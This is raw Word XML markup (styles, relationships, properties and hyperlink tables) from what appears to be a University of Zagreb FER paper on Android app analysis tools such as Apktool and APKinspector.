      <w:spacing w:before="0" w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SlijeenaHiperveza">
    <w:name w:val="FollowedHyperlink"/>
    <w:rsid w:val="00012366"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Reetkatablice">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Obinatablica"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="003B3B2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8">
    <w:name w:val="Table Grid 8"/>
    <w:basedOn w:val="Obinatablica"/>
    <w:rsid w:val="00923678"/>
    <w:pPr>
      <w:spacing w:before="12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tandardWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C7194A"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Jakoisticanje">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D5261B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCNaslov">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Naslov1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00152AC3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore w:val="0"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="432"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="365F91"/>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Obican tekst"/>
    <w:qFormat/>
    <w:rsid w:val="00750888"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00272CCD"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:tabs>
        <w:tab w:val="num" w:pos="432"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="360"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00255C85"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="240"/>
      <w:ind w:left="576"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="pl-PL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="360" w:after="180"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:iCs/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Naslov9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="008B4C8C"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="Zadanifontodlomka">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="Obinatablica">
    <w:name w:val="Normal Table"/>
    <w:semiHidden/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="numbering" w:default="1" w:styleId="Bezpopisa">
    <w:name w:val="No List"/>
    <w:semiHidden/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kod">
    <w:name w:val="kod"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B87AD1"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="708"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Naslovtablice">
    <w:name w:val="Naslov tablice"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="005B2603"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Opisslike">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00ED5BAB"/>
    <w:pPr>
      <w:spacing w:before="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Slika">
    <w:name w:val="Slika"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Naslovslike"/>
    <w:autoRedefine/>
    <w:rsid w:val="00420979"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mjestoidatum">
    <w:name w:val="Mjesto i datum"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="MjestoidatumChar"/>
    <w:rsid w:val="009138C1"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sadraj1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001F2E0C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="480"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sadraj2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00ED5BAB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sadraj3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00ED5BAB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
      </w:tabs>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Naslovslike">
    <w:name w:val="Naslov slike"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00B87AD1"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:i/>
      <w:noProof/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MjestoidatumChar">
    <w:name w:val="Mjesto i datum Char"/>
    <w:link w:val="Mjestoidatum"/>
    <w:rsid w:val="009138C1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="hr-HR" w:eastAsia="hr-HR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hiperlink">
    <w:name w:val="hiperlink"/>
    <w:rsid w:val="005B2603"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="22"/>
      <w:u w:val="single"/>
      <w:lang w:val="hr-HR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Autordokumenta">
    <w:name w:val="Autor dokumenta"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Naslov1"/>
    <w:autoRedefine/>
    <w:rsid w:val="009138C1"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Naslovdokumenta">
    <w:name w:val="Naslov dokumenta"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Autordokumenta"/>
    <w:rsid w:val="005B2603"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hiperveza">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00750888"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Zaglavlje">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F73319"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4703"/>
        <w:tab w:val="right" w:pos="9406"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Podnoje">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F73319"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4703"/>
        <w:tab w:val="right" w:pos="9406"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Brojstranice">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Zadanifontodlomka"/>
    <w:rsid w:val="00F73319"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tekstbalonia">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="001F2E0C"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Odlomakpopisa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00012366"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SlijeenaHiperveza">
    <w:name w:val="FollowedHyperlink"/>
    <w:rsid w:val="00012366"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Reetkatablice">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Obinatablica"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="003B3B2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8">
    <w:name w:val="Table Grid 8"/>
    <w:basedOn w:val="Obinatablica"/>
    <w:rsid w:val="00923678"/>
    <w:pPr>
      <w:spacing w:before="12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tandardWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C7194A"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Jakoisticanje">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D5261B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCNaslov">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Naslov1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00152AC3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore w:val="0"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="432"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="365F9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51252">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="320626340">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="564028274">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="752554392">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1612665427">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="196171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riverbankcomputing.com/software/sip/download" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/windows/apktool.bat" TargetMode="External"/><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image" Target="media/image2.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raphviz.org/Download.php" TargetMode="Externa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ython.org/downloads/" TargetMode="Externa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hyperlink" Target="https://code.google.com/p/apkinspector/"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ip.pypa.io/en/latest/installing.html"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hyperlink" Target="http://stahlworks.com/dev/?tool=zipunzip" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/2/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool%20" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://getandroidstuff.com/download-sms-replicator-android-secret-spy-app/"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hyperlink" Target="http://developer.android.com/index.html"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ourceforge.net/projects/pyqt/files/"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yperlink" Target="http://varaneckas.com/jad/jad158g.win.zip"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https://www.qt.io/download/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/android-apktool/"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yperlink" Target="https://www.youtube.com/watch?v=X538N-x3UU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unny\Desktop\rasipbook_template.dot"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8CFB9-DE94-4E9C-9EED-675A6ED21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rasipbook_template.dot</Template>
  <TotalTime>89</TotalTime>
  <Pages>1</Pages>
  <Words>9272</Words>
  <Characters>52855</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>440</Lines>
  <Paragraphs>124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Sveučilište u Zagrebu</vt:lpstr>
      <vt:lpstr>Sveučilište u Zagrebu</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>FER</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>62003</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="426" baseType="variant">
      <vt:variant>
        <vt:i4>3801132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>372</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.python.org/2/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2556007</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>369</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://developer.android.com/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735655</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>366</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=X538N-x3UUY</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3604578</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>363</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://code.google.com/p/apkinspector/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4522062</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>360</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://stahlworks.com/dev/?tool=zipunzip</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>720971</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>357</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://varaneckas.com/jad/jad158g.win.zip</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815868</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>354</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://getandroidstuff.com/download-sms-replicator-android-secret-spy-app/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3080313</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>351</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4587600</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>348</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/windows/apktool.bat</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2228349</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>345</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://code.google.com/p/android-apktool/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5570574</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>342</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.graphviz.org/Download.php</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225944</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>339</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
